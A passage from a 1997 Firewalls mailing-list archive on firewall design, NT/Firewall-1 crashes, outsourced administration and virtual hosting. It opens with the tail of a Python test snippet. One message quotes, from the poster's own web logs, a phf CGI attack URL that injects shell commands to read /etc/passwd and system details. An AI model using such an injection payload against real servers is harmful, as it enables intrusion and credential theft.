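    cases = [(80, REQ_HTTP10), (8081, REQ_HTTP10), (80, REQ_HTTP11),
             (80, REQ_UNKNOWN), (80, REQ_DUPLICATE), (9999, REQ_HTTP10)]
    for port, req in cases:
        request_line = req.split(b"\r\n")[0].decode()
        print(f"W:{port} {request_line!r} -> {choose_backend(port, req)}")
```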
From owner-firewalls-outgoing Thu Jun 5 02:54:57 1997
Date: Wed, 4 Jun 1997 19:01:30 -0400 (EDT)
From: "John \"E.R.\" Jasen"
To: Rabid Wombat
cc: Jyri Kaljundi, Firewalls@GreatCircle.COM
Subject: Re: Security Crazy

> On Sun, 1 Jun 1997, Jyri Kaljundi wrote:
> > Sat, 31 May 1997, Marcus J. Ranum wrote:
> > > > >> my CEO has gone security crazy [...] win95
> > >
> > > He's a bit unclear on the concept, isn't he?
> >
> > I am pretty sure there actually are good commercial systems available to
> > make large number of win95 machines much more secure than as they are
> > out-of-box.

Not that this pertains to firewalls, but if he's using MicroSoft and security in the same sentence, then he really should look at NT.

--
"What do you want?" -- Mr. Morden, Microsoft Sales VP
-- John E. Jasen // Systems Alchemist \\ jjasen1@umbc.edu --
-- My views are not those of UMBC, AFAIK. HTH. HAND. --

From owner-firewalls-outgoing Thu Jun 5 03:36:18 1997
Date: 04 Jun 1997 17:43:44 -0400
From: Douglas McNaught
To: "Sameer R. Manek"
Cc: firewalls@GreatCircle.COM
Subject: Re: firewall setup
In-Reply-To: "Sameer R. Manek"'s message of Wed, 4 Jun 1997 10:14:45 -0700 (PDT)

"Sameer R. Manek" writes:

> The other day someone drew an ASCII map of how the network should be set up.
> It looked something like this
>
> ---> gateway -+-> firewall ---> internal net
>               |
>          mail server
>
> In this setup i don't really seem to understand the purpose of the
> gateway. Here, my intro to tcp/ip protocols book defines a gateway as a
> device that translates between protocols.

Your book is, well, incomplete. 'Gateway' is often synonymous with 'router'. Here, I think they're talking about the IP router that connects you to the Internet.

Also, that diagram seems to indicate that your mail server lives outside the firewall. I would not do this, since it makes the mail machine vulnerable to SMTP attacks. Proxy SMTP at the firewall and keep the mail server inside.

-Doug
--
sub g{my$i=index$t,$_[0];($i%5,int$i/5)}sub h{substr$t,5*$_[1]+$_[0],1}sub n{(
$_[0]+4)%5}$t='encryptabdfghjklmoqsuvwxz';$c='fxmdwbcmagnyubnyquohyhny';while(
$c=~s/(.)(.)//){($w,$x)=g$1;($y,$z)=g$2;$w==$y&&($p.=h($w,n$x).h($y,n$z))or$x==
$z&&($p.=h(n$w,$x).h(n$y,$z))or($p.=h($y,$x).h($w,$z))}$p=~y/x/ /;print$p,"\n";

From owner-firewalls-outgoing Thu Jun 5 03:46:11 1997
Date: Thu, 5 Jun 1997 11:00:55 +0200 (MET DST)
From: Margarida Oliveira - Paco
To: Petr Snajdr, firewalls@GreatCircle.COM
Subject: ssh client for MacInstosh (System 7.6.1)

Hi.

Does anyone know of a ssh client for Macintosh?

Thanks in advance.

Margarida.
===================================================
Margarida Oliveira   : Phone: +351-53-601159
University of Minho  : mailto:mo@ci.uminho.pt
Braga - Portugal     : http://www.uminho.pt

From owner-firewalls-outgoing Thu Jun 5 04:00:44 1997
Message-ID: <33968FAE.61AAD4B2@pvt.net>
Date: Thu, 05 Jun 1997 12:06:38 +0200
From: Petr Snajdr
To: Margarida Oliveira - Paco
CC: firewalls@GreatCircle.COM
Subject: Re: ssh client for MacInstosh (System 7.6.1)

Margarida Oliveira - Paco wrote:
>
> Hi.
>
> Does anyone know of a ssh client for Macintosh?

F-Secure SSH for the Macintosh 30 Day Trial Version

To run the client on your machine you need: System 7.0 or later, 68020 or better, 3 megabytes free RAM, 2 megabytes free disk space, MacTCP or Open Transport.

http://www.datafellows.com/f-secure/ssh/mac/

Other F-Secure SSH Clients (Windows/Unix):
http://www.datafellows.com/f-secure/fclintp.htm

Petr Snajdr

From owner-firewalls-outgoing Thu Jun 5 05:31:11 1997
Date: Thu, 5 Jun 1997 15:08:46 +0300 (EET DST)
From: Jyri Kaljundi
To: Daniel Strawson
cc: Greg Loffel, fw-1-mailinglist@us.checkpoint.com, Firewalls mailing list
Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts

On Wed, 4 Jun 1997, Daniel Strawson wrote:

> We tried it and, yes we managed to crash an NT based Firewall-1 system.
> This is odd since (if memory serves) the packets should be dropped on the
> floor by the stateful inspection module.

You mean you can crash an NT FW-1 by sending OOB data to it?! That's scary if it is true and should be addressed by Check Point ASAP!

What I have always thought of FW-1 is that it operates at quite low level inside the OS kernel, that as long as you filter everything the network bugs in the OS don't really matter, as the packets never reach FW-1.

If sending some bytes of data to FW1 crashes it and the OS, this combination (FW1+NT) should not be used as a firewall solution at all. May be someone from CP could explain, how much do the bugs in the OS matter once FW1 is installed.

Jüri

From owner-firewalls-outgoing Thu Jun 5 07:31:40 1997
Message-ID: <01BC71C6.F91382C0@MS254.isis.co.za>
Date: Thu, 5 Jun 1997 15:41:42 +-200
From: Pat Verner
To: "'firewalls@greatcircle.com'"
Subject: ICQ and udp port 4000

I have just had a request to open port 4000 for outgoing UDP in order to support a product called ICQ. I must confess to being loath to open unnecessary udp ports, but don't want to let prejudice influence me unduly..

Does anyone know anything about this product, and what the security implications would be in opening the port? Any comments would be appreciated.

There is a blurb about ICQ on http://www.mirabilis.com/

Thanks in anticipation ..

=Pat

From owner-firewalls-outgoing Thu Jun 5 07:43:18 1997
Date: Thu, 5 Jun 1997 14:24:39 +0100 (BST)
From: Daniel Strawson
To: Jyri Kaljundi
cc: Greg Loffel, fw-1-mailinglist@us.checkpoint.com, Firewalls mailing list
Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts

Hang on a moment. Let me put this in perspective.

As I understand it, this problem results from sending packets with a particular IP option set in the header. (Please confirm I'm right here someone). Firewall _SHOULD_ drop all packets with IP options set. This would mean that all Firewall-1 systems and systems behind Firewall-1 are impervious to this attack. (something for Checkpoint to be proud of).

Unfortunately this is not the case - as I say I've managed to get NT to crash with FW-1 installed.

Note that it is not as such a FW-1 insecurity - you cannot get FW-1 to crash, you get the NT system that it is running on to crash, so it is not an insecurity, but a claimed feature that doesn't work.

So, either -
- The IP Options drop code in FW-1 doesn't work.
or
- I do not properly understand this attack and it does not work as I imagine - in this case, please correct me.

Cheers,
Daniel

On Thu, 5 Jun 1997, Jyri Kaljundi wrote:

> On Wed, 4 Jun 1997, Daniel Strawson wrote:
>
> > We tried it and, yes we managed to crash an NT based Firewall-1 system.
> > This is odd since (if memory serves) the packets should be dropped on the
> > floor by the stateful inspection module.
>
> You mean you can crash an NT FW-1 by sending OOB data to it?!
> That's scary if it is true and should be addressed by Check Point ASAP!
>
> What I have always thought of FW-1 is that it operates at quite low level
> inside the OS kernel, that as long as you filter everything the network
> bugs in the OS don't really matter, as the packets never reach FW-1.
>
> If sending some bytes of data to FW1 crashes it and the OS, this
> combination (FW1+NT) should not be used as a firewall solution at all. May
> be someone from CP could explain, how much do the bugs in the OS matter
> once FW1 is installed.
>
> Jüri
>
>

From owner-firewalls-outgoing Thu Jun 5 07:47:03 1997
Date: Thu, 5 Jun 1997 07:35:21 -0600
From: "Paquette, Trevor"
To: "'John Kemker'"
Cc: "'firewalls@GreatCircle.COM'"
Subject: RE: ISP Connection

The decision is up to the individual company.
With proper communication and feedback, there is no reason why you cannot trust another organization to run your firewall for you.

Do you trust your mechanic to run and fix your car? For most of the people out there the answer is yes. Some people do it themselves. (some people also fail miserably at doing it themselves, and likewise some mechanics are just as bad). But when you find the right one.. you keep your business relationship with them. You trust them to keep your car safe and in running condition whenever you need it.

I know that analogy is stretching it, but it does come close to the relationship that you can have with the right ISP and Firewall service administrator.

> -----Original Message-----
> From: John Kemker [SMTP:john.kemker@pfsfhq.com]
> Sent: Wednesday, June 04, 1997 1:09 PM
> To: firewalls@GreatCircle.COM
> Subject: Re: ISP Connection
>
> Handing over your firewall administration to another organization is not,
> in my personal opinion, a wise move. You are saying, in effect, that you
> implicitly trust that organization to always think and act in your
> organization's best interest. This is not realistic.
>
> "Only those defenses are good, certain and durable, which depend on
> yourself alone and your own ability." _The_Prince_ --N. Machiavelli
>
> Administer your firewall yourself. Put it up yourself, define the policies
> yourself and maintain it yourself.
>
> =========== REPLY PARTITION ===========
>
> On 06/04/97, at 12:01 PM, Mariko Yashada wrote:
>
> >
> >Here is a related question:
> >
> >There is another local ISP who will connect us at T1 and install a firewall
> >at our location. They will then administer the firewall remotely from their
> >location. They support three different firewalls, Gauntlet, Firewall-1 and
> >Borderware. The advantage is the savings in admin costs. Has anyone had any
> >experience with this type of arrangement? We have also talked to BBN about
> >their Site Patrol product, which is a remotely managed Gauntlet.
> >
> >Thanks,
> >
> >Mariko
>
> John E. Kemker III
> Systems Engineer, Primerica Financial Services
> 3120 Breckinridge Blvd., Duluth, GA 30199

From owner-firewalls-outgoing Thu Jun 5 08:16:41 1997
Message-Id: <199706051346.JAA02854@hogpb.ho.att.com>
Date: Thu, 5 Jun 1997 09:46:02 -0400
From: "Bryan D. Boyle"
To: Jyri Kaljundi
Cc: firewalls@greatcircle.com
Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts

At 03:08 PM 6/5/97 +0300, you wrote:
>You mean you can crash an NT FW-1 by sending OOB data to it?!
>That's scary if it is true and should be addressed by Check Point ASAP!
>

It is a bogosity with NT and not with FW1. Can't be addressed by Checkpoint, since the OS is not in their control. They can only operate (or be as secure as) at the least common denominator level of the underlying OS.

>What I have always thought of FW-1 is that it operates at quite low level
>inside the OS kernel, that as long as you filter everything the network
>bugs in the OS don't really matter, as the packets never reach FW-1.

Nothing except MS code operates in the NT kernel. This problem is with what happens when you send oob data to a stack (MS) that is tightly integrated with the OS (FW1 runs on top of this stuff, not in it...) and the stack/OS interface and control mechanism itself is crap. Of course, on UN*X systems, this is not the case.

This is a signal example of the difference between designing for peer review of your security model and designing for what gets good trade publication reviews.

>
>If sending some bytes of data to FW1 crashes it and the OS, this
>combination (FW1+NT) should not be used as a firewall solution at all. May
>be someone from CP could explain, how much do the bugs in the OS matter
>once FW1 is installed.

If there is an overall architectural problem with NT as it is, then the OS bugs matter A LOT. But, of course, those that say you can trust a black box solution since the vendors are trustworthy are quite quiet in this regard...

I would agree that you should ignore NT as an OS platform in a security solution right now.

Just my opinion, $.02 US, etc. Flames to /dev/null.

--
Bryan D. Boyle           | LOGICAL: bdboyle@att.com 201-386-8584
#include                 | VIRTUAL: http://www.access.digex.net/~bdboyle
AT&T Laboratories, Inc.  | PHYSICAL: Whippany, NJ
                         | HISTORICAL: HQ, 6th Battalion, Army of No. VA.
"What country can preserve its liberties, if its rulers are not warned from time to time, that its people preserve the spirit of resistance?"
-Thomas Jefferson, 1787

From owner-firewalls-outgoing Thu Jun 5 08:22:46 1997
Message-Id: <199706051407.HAA20909@honor.greatcircle.com>
Date: Thu, 5 Jun 97 10:10:54 EDT
From: Stan Wnuck
To: firewalls@GreatCircle.COM
Subject: psswd HACK

Hello again,

Thanks to all of the responses that I have received on this. One more question.... exactly how did they get my passwd file?

I typed in the URL from my log file into my browser....

http://myserver.somwhere.com/cgi-bin/phf?Jserver=ns.uiuc.edu%0Acat%20/etc/passwd%0Aypcat%20passwd%0Apwd%0Aid%0Auname%20-a%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0

and I got this in return in my browser....

Query Results

/usr/local/bin/ph -m -s ns.uiuc.edu\
cat /etc/passwd\
ypcat passwd\
pwd\
id\
uname -a\
name=foo

Where is the passwd file?

OK! Let's say that they did get my passwd file..... How much damage can they do if I have a firewall in place that my web server sits behind? The only services available from this host to the Internet is http, dns, and smtp. So services like ftp and telnet would be denied if they tried. Is there something I am missing?

Thanks again,

Stan Wnuck                                  swnuck@unixpros.com
Unixpros, Inc.
10 Industrial Way East                      (908) 389-3295 x542
Eatontown, NJ 07724                         (908) 389-5461 Fax
PM-CHS Technology Insertion Office
Ft. Monmouth Army Base, NJ                  (908) 427-2033 / 427-6963

From owner-firewalls-outgoing Thu Jun 5 08:57:33 1997
Message-Id: <3.0.32.19970605065915.00a1b700@mx2.netfrontier.com>
Date: Thu, 5 Jun 1997 06:46:03 -0700
From: pcoppinger@appsware.com (Paul Coppinger)
To: Vin McLellan, firewalls@greatcircle.com
Subject: Re: Fortezza's Fate??

At 04:13 PM 6/4/97 -0500, Vin McLellan wrote:
> There are a lot of rumors buzzing around DC these days to the
>effect that NSA and the Joint Chiefs have tossed in the towel and will,
>within weeks, approve DoD purchases for non-Fortezza security systems, for
>both strong authentication, and (I presume) more standard PKI. I
>understand they have been briefing US.gov security staff and the
>contractors who have been working on Fortezza apps.

I'm, of course, interested in your sources of this information, however I'm more interested in learning what kinds of security systems they intend to use in place of Fortezza. I just can't see protecting classified information using *only* a software token...

> I also understand that DoD is considering approving Fortezza in
>software applications?!?

Are you suggesting that the Skipjack algorithm is about to be published? :)

Paul Coppinger
APPS Software International
4417 North Saddlebag Trail, Suite 1
Tel: 602.947-2227
Fax: 602.947-2280
"THE AUTOMATION BRIDGE"

From owner-firewalls-outgoing Thu Jun 5 09:12:25 1997
Message-Id: <3396B74D.333@coop.crn.org>
Date: Thu, 05 Jun 1997 07:55:42 -0500
From: Joe Doetzl
Reply-To: doetzl@coop.crn.org
To: firewalls@greatcircle.com
Subject: NNTP server in DMZ?

I have a customer who wishes to install a NNTP server. It is likely that they will host internal newsgroups that will need to be protected. The internal network is in the address range reserved for private internetworks. They are using SOCKS for access from the internal network to the Internet. Traffic to the DMZ is limited to ftp, http, dns, smtp and ntp.

With that in mind is it possible to put the NNTP server on the inside and still get a feed from an upstream provider? This solution would eliminate the need for SOCKSified nntp clients. Or should the NNTP server be placed in the DMZ with a registered IP and FQDN and the clients access it via SOCKS? I have a hunch that perhaps NAT would provide an even better solution?

Thank you,
--Joe

From owner-firewalls-outgoing Thu Jun 5 09:38:09 1997
Message-Id: <97Jun5.080502cdt.36891-2@igate.panenergy.com>
Date: Thu, 5 Jun 1997 08:06:32 -0500
From: Robert Laird
To: firewalls@GreatCircle.COM
Subject: client can't reach port 82

First, I'm not a firewall expert (which is why I read this list!), and only know some basics.

Someone came to me and asked why they couldn't reach a Lotus Corp Web site from within their company's firewall, but could easily get to it from their home PC via ISP. I looked at the site and it's using port 82. My guess was that their firewall was set up to block any incoming data from non-standard (port 80) ports. Is this right?
-- Robert --------------------------------------- Robert Laird *** Houston, Texas Quadrant Computer Systems mailto:rlaird@concentric.net mailto:70070.460@compuserve.com mailto:rlaird@panenergy.com Home Page: http://www.concentric.net/~rlaird/ Day phone: 713-260-6586 --------------------------------------------- From owner-firewalls-outgoing Thu Jun 5 09:46:09 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id HAA23029 for firewalls-outgoing; Thu, 5 Jun 1997 07:44:19 -0700 (PDT) Received: from point.sybronint.com ([208.19.132.70]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id HAA23011 for ; Thu, 5 Jun 1997 07:44:11 -0700 (PDT) Received: from xxxaaa ([208.19.132.152]) by point.sybronint.com (8.8.5/8.8.5) with SMTP id SAA12342 for ; Fri, 13 Jun 1997 18:51:47 -0500 Received: by xxxaaa with Microsoft Mail id <01BC7195.8A687AA0@xxxaaa>; Thu, 5 Jun 1997 09:47:54 -0500 Message-ID: <01BC7195.8A687AA0@xxxaaa> From: Matt Eide To: "'firewalls@GreatCircle.COM'" Subject: RE: PIX and Firewall-1 Date: Thu, 5 Jun 1997 09:47:47 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Application proxies monitor commands sent at the application layer, and reconstruct packets so that IP attacks can't be sent beyond the = firewall. (From what I understand), State-based (a.k.a. enhanced extended packet filter) security devices inspect the first packet that comes across with enhanced extended filtering rules and can include additional = authentication. If that packet passes all filtering rules, remaining packets of that = session are passed through without inspection. 
I would like to add that Firewall-1 can be set to continue monitoring = all the packets of an established session and will check them against = the rule base.=20 Later, Matt Meide@sybronint.com From owner-firewalls-outgoing Thu Jun 5 10:02:22 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id HAA21892 for firewalls-outgoing; Thu, 5 Jun 1997 07:26:26 -0700 (PDT) Received: from snoopy.hypercon.com (mail2.concom.com [198.64.246.149]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id HAA21885 for ; Thu, 5 Jun 1997 07:26:19 -0700 (PDT) Received: from pitbull.ep.hess.com ([207.51.255.129]) by snoopy.hypercon.com (post.office MTA v1.9.1 ID# 0-11151) with SMTP id AAA61; Thu, 5 Jun 1997 09:33:09 -0500 Received: from hac31d.ep.hess.com ([15.43.4.161]) by pitbull.ep.hess.com via smtpd (for mail2.concom.com [198.64.246.149]) with SMTP; 5 Jun 1997 14:30:08 UT Message-ID: <3396CD7E.71C4@hypercon.com> Date: Thu, 05 Jun 1997 09:30:22 -0500 From: msquared Reply-To: msquared@hypercon.com X-Mailer: Mozilla 3.0 (Win95; U) MIME-Version: 1.0 To: jlowder@mustang.usafa.af.mil CC: firewalls@greatcircle.com Subject: RAPTOR WEBNOT Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 5 Jun 97 6:09:32 GMT, msquared@hypercon.com wrote: >Lt. have you tried contacting Microsystems directly - >http://www.microsys.com? I suspect you will get a more immediate >response to your problem if you do. Thanks, Mike. That's exactly what I've been doing. BTW, I sent that e-mail to the Raptor list several months ago... Any idea why I'm getting responses all of a sudden? No explanation for the recent Raptor interest. I did notice Alan Rogers from Raptor is involved. When I worked with Raptor, he seemed to be someone who could get things done. I suspect all the recent mail on this list is part of the reason. 
If I were a vendor I would be concerned if the public was getting the perception my product didn't function properly.

I suggest we take this offline from this point since this really isn't a firewall related security issue and probably not of interest to most of the list.

Mike

From owner-firewalls-outgoing Thu Jun 5 10:30:45 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id FAA16374 for firewalls-outgoing; Thu, 5 Jun 1997 05:47:10 -0700 (PDT)
Received: from paranoid.convey.ru (ws04.convey.ru [195.182.128.19]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id FAA16351 for ; Thu, 5 Jun 1997 05:46:58 -0700 (PDT)
Received: (from ark@localhost) by paranoid.convey.ru (8.7.5/8.7.3) id QAA02637; Thu, 5 Jun 1997 16:50:41 +0400
From: ArkanoiD
Message-Id: <199706051250.QAA02637@paranoid.convey.ru>
Subject: Re: Plug-gw- One to many relationship
To: hagan@cih.com
Date: Thu, 5 Jun 1997 16:50:41 +0400 (MSD)
Cc: Firewalls@GreatCircle.COM
In-Reply-To: from "Craig I. Hagan" at Jun 4, 97 01:36:29 pm
X-Mailer: ELM [version 2.4 PL25]
MIME-Version: 1.0
Content-Type: text/plain; charset=koi8-r
Content-Transfer-Encoding: 8bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

nuqneH,

> > You want both clients to be able to plug to either server. To accomplish this, assign two addresses to the firewall on the client side and two addresses to the firewall on the server side so that you have:
>
> heck, why not make it a transparent proxy? i've done that already (ftp.cih.com:~hagan/pub/fix-kits/fwtk/trans.diff.gz [*], NB: old patches). the advantage there is that you don't have to have 8 batrillion entries, permit what you want and let plug-gw figure out the destination host from 'its' ip address as is given by the OS. I'll admit that i've only done this with linux, but, as many have said, solaris and other OSes should work, too.
Hmm, haven't tried those ones, but the ipfilter distribution (BSD systems) includes similar ones for the ipfilter package..

--
CU in Hell /Arkan#iD
Do i believe in Bible? Hell, man, i've seen one!

From owner-firewalls-outgoing Thu Jun 5 10:39:38 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id FAA14810 for firewalls-outgoing; Thu, 5 Jun 1997 05:19:52 -0700 (PDT)
Received: from datacommcorp.com ([206.152.253.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id FAA14781 for ; Thu, 5 Jun 1997 05:19:36 -0700 (PDT)
Message-Id: <199706051219.FAA14781@honor.greatcircle.com>
Received: from [199.34.57.89] by datacommcorp.com (SMTPD32-95.10.15) id A093C1300DA; Thu Jun 05 08:26:59 1997
From: "Steve Rudolph"
To: "David Harvey-George" ,
Subject: Re: FW-1 and IP Forwarding on NT Box
Date: Thu, 5 Jun 1997 08:26:39 -0400
X-MSMail-Priority: Normal
X-Priority: 3
X-Mailer: Microsoft Internet Mail 4.70.1161
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

David and group....

I have already got this running. Thank you to all who responded to my inquiry. I have learned a lot just from the replies. I left my brain in the shower that day..... I forgot to set the Default Gateway on EACH machine on both networks to the NIC in the router on that machine's network.

Now I just need to crack the router password for a Cisco AccessPro 2500 PC card. This piece of equipment came in a firewall disguise called MCI Webmaker. This was a combination port filter router and proxy server. As it turns out Intel programmed the software (proxy), and configured the router. Vanstar installed the OS (NT), and none of the above are able to get me the router password.
Right now my DNS is being partially blocked because of this (I know very little about DNS, any good books? I am using MS DNS-OK for now (:o) ).

I contacted Cisco and the only way to break the password is to send a break to the com port (remember it is a PC card) in terminal mode within 60 seconds. And then begin the recovery sequence. Kind of hard to do with NT or 95. I can't seem to find a copy of DOS 5.0 or an old hard drive anywhere with a DOS based terminal program.

This whole situation is messed. My employer wants to wait to use the router and not buy a new one. It is holding up US$40K in billing though. Can anyone help, or if you have a similar problem let me know and I will get you the correct person to call.

Thanks again

Steve Rudolph
http://www.datacommcorp.com
srudolph@datacommcorp.com
http://www.rude-dog.com
http://www.rust.net/~stever
stever@rust.net

----------
> From: David Harvey-George
> To: Steve Rudolph ; firewalls@greatcircle.com
> Subject: Re: FW-1 and IP Forwarding on NT Box
> Date: Wednesday, June 04, 1997 7:14 PM
>
> > I followed all of microsoft's recommendations.
>
> Possibly a bad move.
>
> > Two nic cards a and b
>
> Sounds like the start of a stand-up comedy routine
>
> > A is set with default gateway of b
> > and b is set with gateway of a
>
> it is!
>
> Okay, look, the system with the two cards knows how to route to each network. All you've gotta do is set up the default gateway for workstations on network A (NIC A) and the default gateway for workstations on network B (NIC B). Don't touch anything on the router if your network really is this simple (e.g. no other routes). If you have other routes then use the route command directly.
>
> > Workstations can ping a and b
> > Workstations cannot ping network b
> > Ip forwarding is enabled and my route print matches exactly the format of microsofts recommendations.
> >
> > I really need to get this up and running.
> > I would get you the route print, but I cannot get the addresses to copy onto the clip board..duh :)
>
> Yeah, I think you better send us the output from netstat on both the 'router' and the workstations.
>
> Run netstat -rn from a DoZ window, click on the little Doz icon at the left of the title bar, select edit/mark, mark the stuff you want to send, copy it and paste it.
>
> David

From owner-firewalls-outgoing Thu Jun 5 10:54:44 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id HAA22520 for firewalls-outgoing; Thu, 5 Jun 1997 07:37:30 -0700 (PDT)
Received: from cerberus2.fon.sprintcorp.com (cerberus2.fon.sprintcorp.com [204.215.0.61]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id HAA22376 for ; Thu, 5 Jun 1997 07:35:06 -0700 (PDT)
From: BLeBlanc@igate.sprint.com
Received: by cerberus2.fon.sprintcorp.com; id JAA04475; Thu, 5 Jun 1997 09:38:49 -0500 (CDT)
Received: from fonkc28.fon.sprintcorp.com(144.223.19.54) by cerberus2.fon.sprintcorp.com via smap (3.2) id xma004469; Thu, 5 Jun 97 09:38:47 -0500
Received: FROM FONIMAIL.fonkc28.fon.sprintcorp.com BY fonkc28.fon.sprintcorp.com ; 5 JUN 97 09:39:10 CDT
Date: 5 JUN 97 09:36:55 CDT
Subject: RE: ISP Connection
To: firewalls@greatcircle.com
Message-ID: <0007wwcaiamc.H000012201eadb69@igate.sprint.com>
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Having a third party perform the administrative functions must be determined by weighing many factors. You need to decide:

"Which security technology is best for my environment?" (based on your security policy - what type(s) of security need to be deployed? Firewall? Strong Authentication? Encryption? and what/who are you trying to secure?)

"Who are the respected and reliable vendors in the market?" (this must include the third party that you are considering doing the management, as well as the vendor/manufacturer of the security products themselves).
Obviously, monetary cost factors come into play. Whether you buy the hardware/os/software and manage the components in-house -vs- you out-source these to a third party and pay month-to-month.

Do you have the staff to manage the firewall in-house? (A firewall is NOT a collateral duty to be assigned to a data center's staff that has no background in firewalls).

What level of expertise does the third-party have? (Your third-party vendor should have a significantly sized team of security engineers that have substantial background and knowledge in the security areas you need/choose).

What standard services does the third party perform? You (the customer) must have the ability to sit with the third party and "design a unique-to-you" security service. YOU must be able to determine the rules. You must have the power to change those rules at any time (24*7*365).

What value-added services does the third party perform? Do they perform monitoring for suspicious activity? Do they perform backups on all of the critical files and maintain them off-site (this should be part of your disaster recovery plan for all systems)? Do they provide you with a detailed report of what happened on the firewall?

Once you have weighed these issues (these being a sample of the total questions you need to ask yourself and the third-party provider), you should be able to make a determination on whether to handle the task in-house or out-source.

Hope this helps,
Bob

>----------
>From: Mariko Yashada[SMTP:mariko@grfn.org]
>Sent: Wednesday, June 04, 1997 3:01 PM
>To: Firewalls Mailing List
>Subject: Re: ISP Connection
>
>Thank you for all your comments. Last fall our plan was to connect to the Internet through MCI. We security people said fine, but you will need a firewall for any connections between the Internet and the Enterprise Network. So we did an evaluation of firewalls and settled on two we felt best suited our needs.
>The firewall added enough cost to the project that it was postponed. It has now been revived using our ISP for the connection with the hope the ISP can some way offer the security. I see now we should follow our original plan and put up a firewall at our end.
>
>Here is a related question:
>
>There is another local ISP who will connect us at T1 and install a firewall at our location. They will then administer the firewall remotely from their location. They support three different firewalls, Gauntlet, Firewall-1 and Borderware. The advantage is the savings in admin costs. Has anyone had any experience with this type of arrangement? We have also talked to BBN about their Site Patrol product, which is a remotely managed Gauntlet.
>
>Thanks,
>
>Mariko

From owner-firewalls-outgoing Thu Jun 5 11:33:21 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id FAA16373 for firewalls-outgoing; Thu, 5 Jun 1997 05:47:10 -0700 (PDT)
Received: from psyche.the-wire.com (psyche.the-wire.com [198.53.192.2]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id FAA16349 for ; Thu, 5 Jun 1997 05:46:55 -0700 (PDT)
Received: from anton.the-wire.com (anton.the-wire.com [205.206.32.227]) by psyche.the-wire.com (8.8.5/8.6.12) with SMTP id IAA16830; Thu, 5 Jun 1997 08:45:40 -0400 (EDT)
Message-Id: <3.0.32.19970605082442.0094c5f0@the-wire.com>
X-Sender: anton@the-wire.com
X-Mailer: Windows Eudora Pro Version 3.0 (32)
Date: Thu, 05 Jun 1997 08:47:10 -0400
To: Bernd Eckenfels
From: Anton J Aylward
Subject: Re: Plug-gw- One to many relationship
Cc: firewalls@greatcircle.com
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

At 01:07 AM 05/06/97 +0200, you wrote:
## Reply Start ##
>Hi,
>
>> No, no, no, what *I* want and what about 10^7 other sites want is this...
>>
>>   client A                   W        server C
>>                          firewall     server D
>>   client B                            server F
>>                                       server G
>>                                       server H
>>                                       server I
>>                                       server K
>
>there are 2 Solutions (if we are talking about WWW)

Yes, we are.

>a) use different Ports
>   W:80   -> C:80
>   W:8080 -> D:80
>   W:8081 -> E:80

Thank you, granted, but not the question I was posing. This is a specific answer not a general one.

>b) use the Host Command from HTTP which no browser nor Server does Support yet :)

Good thing you put the smiley in.

>To get back on it, its not a problem of software, but of design. There is no way a Server can tell what the host part of an URL was other than looking at the connected address:port Combination. If you have only one valid address you can run only one server at a given port.

Now we're getting down to it.

Most of the people who have responded to me have missed out on a very important fact. You can't regenerate lost information.

If we have a publicly available DNS - somewhere out on the 'net - has that single IP address ("W" in my diagram above) for all of

    www.company001.com for server "C"
    www.company002.com for server "D"
    www.company003.com for server "E"
    ...
    www.company253.com ......
    www.company254.com ......

The fw sees an incoming packet from a remote client which has

    SrcAddr:
    DstAddr: the single address supplied by DNS
    Port: 80

then the DNS mapping has LOST information. To tell whether to map a connection to "W:80" to server "C" or to server "D" requires regenerating this information.

Now the answer (B) above takes the view that the message body contains this information. Problem solved, there is a means of regenerating the information. Only it isn't there.

If this problem were trivially solvable, then we wouldn't be doing IP masquerading on web servers. We would have a single (physical) server with a single (software) instance of the server running for all of

    www.company001.com
    www.company002.com
    www.company003.com
    ...
    www.company253.com
    www.company254.com

We don't do this, we are eating up IP addresses for each and every server quite independently of the NAT situation.

I believe this is a problem in information content. The HOST command, as Bernd says, is not implemented widely enough to make it practical. The people who talk about kernel hack support for a plug-gw solution have not made it clear how the lost information is to be regenerated.

I'd like to shift the focus of this discussion away from talking about hacking plug-gw and to the real question, one of Information Theory. I say again, the many-to-one mapping of DNS is information lossy. How are you going to generate that information so that whatever your code hack is can perform the correct one-to-many mapping at the firewall.

Like Alice talking to the Cat: You have to know where you're going.

## Reply End ##
--------------------------------------------------------------------------
Anton J Aylward                  | Security is not something that comes in
The Strahn & Strachan Group Inc  | a self-contained box. It is an attribute
Information Security Consultants | of how you do business and as such
Voice: (416) 494-8661            | needs to be managed carefully.
Fax:   (416) 494-8803            |   - Karen Goertzel, Wang Federal Inc.

From owner-firewalls-outgoing Thu Jun 5 11:42:52 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id KAA13925 for firewalls-outgoing; Thu, 5 Jun 1997 10:04:47 -0700 (PDT)
